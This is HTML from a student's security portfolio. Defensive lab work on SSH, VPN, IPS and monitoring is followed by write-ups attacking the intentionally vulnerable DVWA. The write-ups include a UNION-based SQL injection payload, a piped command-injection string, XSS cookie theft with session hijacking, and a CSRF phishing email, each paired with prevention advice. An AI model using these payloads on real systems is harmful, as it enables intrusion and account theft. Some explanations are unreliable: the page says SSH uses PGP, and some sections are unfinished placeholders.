          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
